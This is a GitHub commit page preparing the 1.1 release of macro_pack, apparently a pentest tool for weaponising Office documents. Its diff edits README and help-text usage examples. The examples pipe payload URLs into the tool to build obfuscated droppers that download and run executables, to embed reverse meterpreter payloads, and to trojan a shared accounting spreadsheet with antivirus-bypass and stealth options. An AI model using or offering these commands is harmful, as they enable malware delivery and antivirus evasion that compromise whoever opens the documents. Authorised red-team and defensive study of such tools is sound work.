Prepare for 1.1 release

sevagas · Oct 13, 2017 · d5202a6 · d5202a6
1 parent 2dbe59d
commit d5202a6
Show file tree

Hide file tree

Showing 2 changed files with 5 additions and 4 deletions.
diff --git a/README.md b/README.md
@@ -10,6 +10,7 @@ It is very simple to use:
 * No configuration
 * Everything can be done using a single line of code
 * Generation of Word, Excel, and PowerPoint documents
+* Advanced VBA macro attacks as well as DDE attacks
 
 The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, ...).
 It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool.
@@ -98,7 +99,7 @@ macro_pack.exe -f empire.vba -o -W myDoc.docm
 
 - Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)
 ```bash
-echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -x "drop.xlsm" 
+echo "https://myurl.url/payload.exe" "dropped.exe" |  macro_pack.exe -o -t DROPPER -X "drop.xlsm" 
 ```
 
 - Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder: 
@@ -132,7 +133,7 @@ python macro_pack.py --dde -f ..\resources\community\ps_dl_exec.cmd -w DDE.doc
 
 - Trojan the existing shared "report.xlsm" file with a dropper. Use anti-AV and anti-debug features.
 ```bash
-echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER2 --trojan --av-bypass --stealth  -X "E:\accounting\report.xlsm"   
+echo "http://10.5.5.12/drop.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER2 --trojan --av-bypass --stealth  -x "E:\accounting\report.xls"   
 ```
 
 - Genenerate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.

diff --git a/src/macro_pack.py b/src/macro_pack.py
@@ -45,7 +45,7 @@
 
 
 WORKING_DIR = "temp"
-VERSION="1.1-dev"
+VERSION="1.1"
 BANNER = """\
 
   _  _   __    ___  ____   __     ____   __    ___  __ _ 
@@ -93,7 +93,7 @@ def usage():
     -t, --template=TEMPLATE_NAME 
         Available templates:
             HELLO   -> Just print a hello message and awareness about macro
-                    -> Example use: echo "@EmericNasi" | %s -t HELLO -P hello.pptm
+                    -> Example use: echo "@Author" | %s -t HELLO -P hello.pptm
             DROPPER -> Download and exec file
                     -> Example use:  echo <file_to_drop_url> "<download_path>" | %s -t DROPPER -o -x dropper.xls
             DROPPER2 -> Download and exec file. File attributes are also set to system, read-only, and hidden